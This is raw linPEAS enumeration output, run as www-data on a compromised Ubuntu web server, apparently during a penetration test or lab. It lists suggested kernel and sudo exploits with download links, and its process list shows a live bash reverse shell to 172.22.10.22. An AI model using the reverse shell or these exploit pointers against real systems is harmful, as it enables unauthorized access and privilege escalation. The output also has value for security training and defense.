                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.4.0-204-generic (buildd@lcy02-amd64-079) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024
Distributor ID: Ubuntu
Description:    Ubuntu 20.04.6 LTS
Release:        20.04
Codename:       focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31


╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

╔══════════╣ Date & uptime
Sun Jun 14 20:45:48 UTC 2026
 20:45:48 up 45 min,  0 users,  load average: 0.51, 0.26, 0.10

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
/dev/disk/by-id/dm-uuid-LVM-AifyW6JaHCamcfTUEyVvjvDG1vKVF2sjr7WiyJSXWpFwTHp8NXMgwMbX2dyfwykj / ext4 defaults 0 1
/dev/disk/by-uuid/460f4d05-7dc8-40c7-85ac-a47670c8e938 /boot ext4 defaults 0 1
/swap.img       none    swap    sw      0       0

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk

╔══════════╣ Environment
╚ Any private information inside environment variables?
SHLVL=3
OLDPWD=/var/www/html/public
PS1=$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:21874
_=./linpeas.sh
TERM=xterm-256color
HISTCONTROL=ignorespace
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
INVOCATION_ID=bf4674a3db864b86bfe4419f251c43dd
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154


Vulnerable to CVE-2021-3560

╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (kvm)

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
                                   ╚═══════════╝
╔══════════╣ Container related tools present (if any):
/snap/bin/lxc
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     ╚═══════╝
Learn and practice cloud hacking techniques in training.hacktricks.xyz

═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No
═╣ Aliyun ECS? .......................... No
═╣ Tencent CVM? ......................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root           1  0.1  0.3 103960 12876 ?        Ss   20:00   0:03 /sbin/init auto automatic-ubiquity noprompt
root         364  0.0  0.3  35752 12344 ?        S<s  20:00   0:00 /lib/systemd/systemd-journald
root         398  0.0  0.1  22504  5884 ?        Ss   20:00   0:00 /lib/systemd/systemd-udevd
root         542  0.0  0.4 280136 17948 ?        SLsl 20:00   0:00 /sbin/multipathd -d -s
systemd+     593  0.0  0.1  90880  6076 ?        Ssl  20:00   0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
systemd+     631  0.0  0.1  27264  7684 ?        Ss   20:00   0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
systemd+     633  0.0  0.3  24812 12468 ?        Ss   20:00   0:00 /lib/systemd/systemd-resolved
root         645  0.0  0.1 235572  7264 ?        Ssl  20:00   0:00 /usr/lib/accountsservice/accounts-daemon
root         652  0.0  0.0   6816  2896 ?        Ss   20:00   0:00 /usr/sbin/cron -f
message+     653  0.0  0.1   7660  4812 ?        Ss   20:00   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root         662  0.0  0.0  81828  3640 ?        Ssl  20:00   0:00 /usr/sbin/irqbalance --foreground
root         667  0.0  0.4  29692 18872 ?        Ss   20:00   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         668  0.0  0.1 232728  6868 ?        Ssl  20:00   0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog       669  0.0  0.1 224344  4788 ?        Ssl  20:00   0:00 /usr/sbin/rsyslogd -n -iNONE
root         672  0.0  0.7 1321176 31260 ?       Ssl  20:00   0:01 /usr/lib/snapd/snapd
root         677  0.0  0.1  17224  7556 ?        Ss   20:00   0:00 /lib/systemd/systemd-logind
root         684  0.0  0.3 393248 12124 ?        Ssl  20:00   0:00 /usr/lib/udisks2/udisksd
daemon[0m       687  0.0  0.0   3796  2216 ?        Ss   20:00   0:00 /usr/sbin/atd -f
root         701  0.0  0.0   5828  1984 tty1     Ss+  20:00   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root         751  0.0  0.2 315108 11364 ?        Ssl  20:00   0:00 /usr/sbin/ModemManager
root         763  0.0  0.5 107920 20932 ?        Ssl  20:00   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root         812  0.0  0.9 184928 36560 ?        Ss   20:00   0:00 /usr/sbin/apache2 -k start
www-data     829  0.0  0.7 318340 31608 ?        Sl   20:00   0:00  _ /usr/sbin/apache2 -k start
www-data     830  0.0  0.7 318348 31116 ?        Sl   20:00   0:00  _ /usr/sbin/apache2 -k start
www-data     831  0.0  0.7 318584 31132 ?        Sl   20:00   0:00  _ /usr/sbin/apache2 -k start
www-data     832  0.0  0.7 318276 28192 ?        Sl   20:00   0:00  _ /usr/sbin/apache2 -k start
www-data    6061  0.0  0.0   2608   596 ?        S    20:42   0:00  |   _ sh -c bash -c 'bash -i >& /dev/tcp/172.22.10.22/10050 0>&1'
www-data    6062  0.0  0.0   3976  3032 ?        S    20:42   0:00  |       _ bash -c bash -i >& /dev/tcp/172.22.10.22/10050 0>&1
www-data    6063  0.0  0.0   4240  3544 ?        S    20:42   0:00  |           _ bash -i
www-data    6099  0.0  0.0   2636  1840 ?        S    20:42   0:00  |               _ /usr/bin/script -qc /usr/bin/bash /dev/null
www-data    6100  0.0  0.0   2608   532 pts/0    Ss   20:42   0:00  |                   _ sh -c /usr/bin/bash
www-data    6101  0.0  0.0   4240  3540 pts/0    S    20:42   0:00  |                       _ /usr/bin/bash
www-data    6458  0.2  0.0   3472  2796 pts/0    S+   20:45   0:00  |                           _ /bin/sh ./linpeas.sh
www-data    9714  0.0  0.0   3472  1080 pts/0    S+   20:45   0:00  |                               _ /bin/sh ./linpeas.sh
www-data    9718  0.0  0.0   6036  3044 pts/0    R+   20:45   0:00  |                               |   _ ps fauxwww
www-data    9717  0.0  0.0   3472  1080 pts/0    S+   20:45   0:00  |                               _ /bin/sh ./linpeas.sh
www-data     833  0.0  0.7 318348 30760 ?        Sl   20:00   0:00  _ /usr/sbin/apache2 -k start
www-data    4338  0.0  0.7 318512 28276 ?        Sl   20:29   0:00  _ /usr/sbin/apache2 -k start
mysql        813  0.3  9.9 1791356 397636 ?      Ssl  20:00   0:08 /usr/sbin/mysqld
root        1344  0.0  0.1 124192  6704 ?        Ss   20:01   0:00 /usr/local/cloudmonitor/bin/argusagent -d
root        1346  0.0  0.0   2608   596 ?        S    20:01   0:00  _ /bin/sh -c /usr/local/cloudmonitor/bin/argusagent
root        1347  0.8  0.8 1291048 35176 ?       Sl   20:01   0:24      _ /usr/local/cloudmonitor/bin/argusagent
root        4645  0.1  0.4 689688 18324 ?        Ssl  20:30   0:01 /usr/local/share/aliyun-assist/aliyun-service.symlink


╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 process found (dump creds from memory as root)
sshd: process found (dump creds from memory as root)

╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
Proc 593 with ppid 1 is run by user systemd-timesync but the ppid user is root
Proc 631 with ppid 1 is run by user systemd-network but the ppid user is root
Proc 633 with ppid 1 is run by user systemd-resolve but the ppid user is root
Proc 653 with ppid 1 is run by user messagebus but the ppid user is root
Proc 669 with ppid 1 is run by user syslog but the ppid user is root
Proc 687 with ppid 1 is run by user daemon but the ppid user is root
Proc 813 with ppid 1 is run by user mysql but the ppid user is root
Proc 829 with ppid 812 is run by user www-data but the ppid user is root
Proc 830 with ppid 812 is run by user www-data but the ppid user is root
Proc 831 with ppid 812 is run by user www-data but the ppid user is root
Proc 832 with ppid 812 is run by user www-data but the ppid user is root
Proc 833 with ppid 812 is run by user www-data but the ppid user is root
Proc 4338 with ppid 812 is run by user www-data but the ppid user is root

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND     PID  TID TASKCMD               USER   FD      TYPE DEVICE SIZE/OFF   NODE NAME

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root    1042 Feb 13  2020 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x   2 root root 4096 Mar 14  2023 .
drwxr-xr-x 104 root root 4096 Jun 14 20:01 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rw-r--r--   1 root root  201 Feb 14  2020 e2scrub_all
-rw-r--r--   1 root root  190 Mar 14  2023 popularity-contest

/etc/cron.daily:
total 52
drwxr-xr-x   2 root root 4096 Jan 20  2025 .
drwxr-xr-x 104 root root 4096 Jun 14 20:01 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  539 Dec  4  2023 apache2
-rwxr-xr-x   1 root root  376 Sep 16  2021 apport
-rwxr-xr-x   1 root root 1478 Apr  9  2020 apt-compat
-rwxr-xr-x   1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root 1187 Sep  5  2019 dpkg
-rwxr-xr-x   1 root root  377 Jan 21  2019 logrotate
-rwxr-xr-x   1 root root 1123 Feb 25  2020 man-db
-rwxr-xr-x   1 root root 4574 Jul 18  2019 popularity-contest
-rwxr-xr-x   1 root root  214 Jan 20  2023 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Mar 14  2023 .
drwxr-xr-x 104 root root 4096 Jun 14 20:01 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Mar 14  2023 .
drwxr-xr-x 104 root root 4096 Jun 14 20:01 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x   2 root root 4096 Mar 14  2023 .
drwxr-xr-x 104 root root 4096 Jun 14 20:01 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  813 Feb 25  2020 man-db
-rwxr-xr-x   1 root root  403 Jan 20  2023 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                        LEFT          LAST                        PASSED               UNIT                         ACTIVATES                     
Mon 2026-06-15 00:00:00 UTC 3h 14min left Sun 2026-06-14 20:00:17 UTC 45min ago            fstrim.timer                 fstrim.service                
Mon 2026-06-15 00:00:00 UTC 3h 14min left Sun 2026-06-14 20:00:17 UTC 45min ago            logrotate.timer              logrotate.service             
Mon 2026-06-15 00:00:00 UTC 3h 14min left Sun 2026-06-14 20:00:17 UTC 45min ago            man-db.timer                 man-db.service                
Mon 2026-06-15 00:58:56 UTC 4h 12min left Tue 2025-01-21 02:17:04 UTC 1 years 4 months ago motd-news.timer              motd-news.service             
Mon 2026-06-15 01:03:39 UTC 4h 17min left Tue 2025-01-21 03:16:44 UTC 1 years 4 months ago fwupd-refresh.timer          fwupd-refresh.service         
Mon 2026-06-15 02:58:32 UTC 6h left       Sun 2026-06-14 20:30:28 UTC 15min ago            ua-timer.timer               ua-timer.service              
Mon 2026-06-15 06:08:51 UTC 9h left       Sun 2026-06-14 20:30:29 UTC 15min ago            apt-daily-upgrade.timer      apt-daily-upgrade.service     
Mon 2026-06-15 07:48:58 UTC 11h left      Tue 2025-01-21 02:17:04 UTC 1 years 4 months ago apt-daily.timer              apt-daily.service             
Mon 2026-06-15 20:15:05 UTC 23h left      Sun 2026-06-14 20:15:05 UTC 30min ago            systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2026-06-21 03:10:41 UTC 6 days left   Sun 2026-06-14 20:00:43 UTC 45min ago            e2scrub_all.timer            e2scrub_all.service           
n/a                         n/a           n/a                         n/a                  snapd.snap-repair.timer      snapd.snap-repair.service     

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/atd.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/grub-common.service could be executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service could be executing some relative path
You can't write on systemd PATH

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/cloud-init.target.wants/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/snap/core20/1828/etc/systemd/system/cloud-init.target.wants/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/snap/core20/1828/usr/lib/systemd/system/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/snap/core20/1828/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core20/1828/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core20/1828/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core20/1828/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core20/1828/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core20/1828/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core20/1828/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core20/1828/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core20/1828/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core20/2434/etc/systemd/system/cloud-config.target.wants/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/snap/core20/2434/usr/lib/systemd/system/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd
/snap/core20/2434/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core20/2434/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core20/2434/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core20/2434/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core20/2434/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core20/2434/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core20/2434/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core20/2434/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core20/2434/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: -e expression #1, char 0: no previous regular expression
/org/kernel/linux/storage/multipathd
/run/dbus/system_bus_socket
  └─(Read Write)
/run/irqbalance//irqbalance662.sock
  └─(Read )
/run/irqbalance/irqbalance662.sock
  └─(Read )
/run/lvm/lvmpolld.socket
/run/mysqld/mysqld.sock
  └─(Read Write)
/run/mysqld/mysqlx.sock
  └─(Read Write)
/run/snapd-snap.socket
  └─(Read Write)
/run/snapd.socket
  └─(Read Write)
/run/systemd/fsck.progress
/run/systemd/inaccessible/sock
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write)
/run/udev/control
/run/uuidd/request
  └─(Read Write)
/tmp/aliyun_assist_service.sock
/usr/local/cloudmonitor/local_data/argus.sock
  └─(Read )
/var/run/mysqld/mysqld.sock
  └─(Read Write)
/var/run/mysqld/mysqlx.sock
  └─(Read Write)
/var/snap/lxd/common/lxd/unix.socket

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                            PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                            631 systemd-network systemd-network  :1.0          systemd-networkd.service    -       -
:1.1                            633 systemd-resolve systemd-resolve  :1.1          systemd-resolved.service    -       -
:1.11                           763 unattended-upgr root             :1.11         unattended-upgrades.service -       -
:1.12                           667 networkd-dispat root             :1.12         networkd-dispatcher.service -       -
:1.13                           672 snapd           root             :1.13         snapd.service               -       -
:1.17                          4645 aliyun-service. root             :1.17         aliyun.service              -       -
:1.18                          4645 aliyun-service. root             :1.18         aliyun.service              -       -
:1.2                            593 systemd-timesyn systemd-timesync :1.2          systemd-timesyncd.service   -       -
:1.25                         13313 busctl          www-data         :1.25         apache2.service             -       -
:1.3                              1 systemd         root             :1.3          init.scope                  -       -
:1.4                            668 polkitd         root             :1.4          polkit.service              -       -
:1.5                            645 accounts-daemon[0m root             :1.5          accounts-daemon.service     -       -
:1.6                            684 udisksd         root             :1.6          udisks2.service             -       -
:1.7                            677 systemd-logind  root             :1.7          systemd-logind.service      -       -
:1.8                            751 ModemManager    root             :1.8          ModemManager.service        -       -
com.ubuntu.LanguageSelector       - -               -                (activatable) -                           -       -
com.ubuntu.SoftwareProperties     - -               -                (activatable) -                           -       -
io.netplan.Netplan                - -               -                (activatable) -                           -       -
org.freedesktop.Accounts        645 accounts-daemon[0m root             :1.5          accounts-daemon.service     -       -
org.freedesktop.DBus              1 systemd         root             -             init.scope                  -       -
org.freedesktop.ModemManager1   751 ModemManager    root             :1.8          ModemManager.service        -       -
org.freedesktop.PackageKit        - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1      668 polkitd         root             :1.4          polkit.service              -       -
org.freedesktop.UDisks2         684 udisksd         root             :1.6          udisks2.service             -       -
org.freedesktop.UPower            - -               -                (activatable) -                           -       -
org.freedesktop.bolt              - -               -                (activatable) -                           -       -
org.freedesktop.fwupd             - -               -                (activatable) -                           -       -
org.freedesktop.hostname1         - -               -                (activatable) -                           -       -
org.freedesktop.locale1           - -               -                (activatable) -                           -       -
org.freedesktop.login1          677 systemd-logind  root             :1.7          systemd-logind.service      -       -
org.freedesktop.network1        631 systemd-network systemd-network  :1.0          systemd-networkd.service    -       -
org.freedesktop.resolve1        633 systemd-resolve systemd-resolve  :1.1          systemd-resolved.service    -       -
org.freedesktop.systemd1          1 systemd         root             :1.3          init.scope                  -       -
org.freedesktop.thermald          - -               -                (activatable) -                           -       -
org.freedesktop.timedate1         - -               -                (activatable) -                           -       -
org.freedesktop.timesync1       593 systemd-timesyn systemd-timesync :1.2          systemd-timesyncd.service   -       -
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf (        <policy group="power">)



                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
                              ╚═════════════════════╝
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:32:30:e3 brd ff:ff:ff:ff:ff:ff
    inet 172.22.10.3/24 brd 172.22.10.255 scope global dynamic ens3
       valid_lft 1892157253sec preferred_lft 1892157253sec
    inet6 fe80::216:3eff:fe32:30e3/64 scope link 
       valid_lft forever preferred_lft forever

╔══════════╣ Hostname, hosts and DNS
openrasp
127.0.0.1 localhost
127.0.1.1 openrasp

::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

nameserver 127.0.0.53
options edns0 trust-ad
search localdomain

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp   LISTEN 0      70              127.0.0.1:33060        0.0.0.0:*            
tcp   LISTEN 0      151             127.0.0.1:3306         0.0.0.0:*            
tcp   LISTEN 0      4096        127.0.0.53%lo:53           0.0.0.0:*            
tcp   LISTEN 0      128               0.0.0.0:22           0.0.0.0:*            
tcp   LISTEN 0      511                     *:80                 *:*            
tcp   LISTEN 0      128                  [::]:22              [::]:*            

╔══════════╣ Can I sniff with tcpdump?
No



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Sorry, try again.


╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
ubuntu:x:1000:1000:openrasp:/home/ubuntu:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),117(lxd)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=111(fwupd-refresh) gid=116(fwupd-refresh) groups=116(fwupd-refresh)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=113(sshd) gid=65534(nogroup) groups=65534(nogroup)
